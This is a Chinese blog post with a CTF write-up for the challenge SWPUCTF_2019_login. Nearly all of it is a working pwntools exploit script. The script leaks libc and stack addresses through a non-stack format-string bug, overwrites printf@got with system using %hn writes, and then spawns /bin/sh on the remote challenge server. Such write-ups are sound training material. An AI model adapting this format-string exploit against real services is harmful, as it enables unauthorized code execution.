BUU-SWPUCTF_2019_login-WP

chuj

2021 年 01 月 27 日

1080 次浏览

暂无评论

2131字数

CTF-WP

本来想改返回地址的，但是发现不论是`one_gadget`还是`system`都出现了`dump core`，据说是32位程序这样改返回地址很容易爆，我也不知道为什么。最后还是覆写的`printf@got`。

没有新知识，就是非栈上的格式化字符串。

### exp

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#context(log_level = 'debug')

#sh = process("./SWPUCTF_2019_login")
sh = remote("node3.buuoj.cn",28692)
libc = ELF("./libcs/libc-2.27.so")

sh.sendlineafter("name: \n",'pwn')

payload = "%15$p"
sh.sendlineafter("password: \n",payload)
sh.recvuntil("password: ")
libc_base = int(sh.recvuntil("\n",drop = True),base = 16)
libc_base = libc_base - (libc.symbols["__libc_start_main"] + 241)
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.symbols["system"]
log.success("system_addr:" + hex(system_addr))
printf_got = ELF("./SWPUCTF_2019_login").got["printf"]
log.success("printf@got:" + hex(printf_got))

payload = "%6$p"
sh.sendlineafter("again!\n",payload)
sh.recvuntil("password: ")
stack_addr = int(sh.recvuntil("\n",drop = True),base = 16) - 0x10
log.success("stack_addr:" + hex(stack_addr))

payload = "%" + str((stack_addr + 4) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(printf_got & 0xffff) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)

payload = "%" + str((stack_addr + 6) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(printf_got >> 16) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)

payload = "%" + str((stack_addr + 8) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((printf_got + 2) & 0xffff) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)

payload = "%" + str((stack_addr + 10) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((printf_got + 2) >> 16) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)

payload = "%" + str(system_addr & 0xffff) + 'c' + "%7$hn" 
payload += "%" + str((system_addr >> 16) - (system_addr & 0xffff)) + 'c' + "%8$hn"
print payload
sh.sendlineafter("again!\n",payload)

sh.sendlineafter("again!\n","/bin/sh")

sh.interactive()
```

最后修改：2021 年 01 月 27 日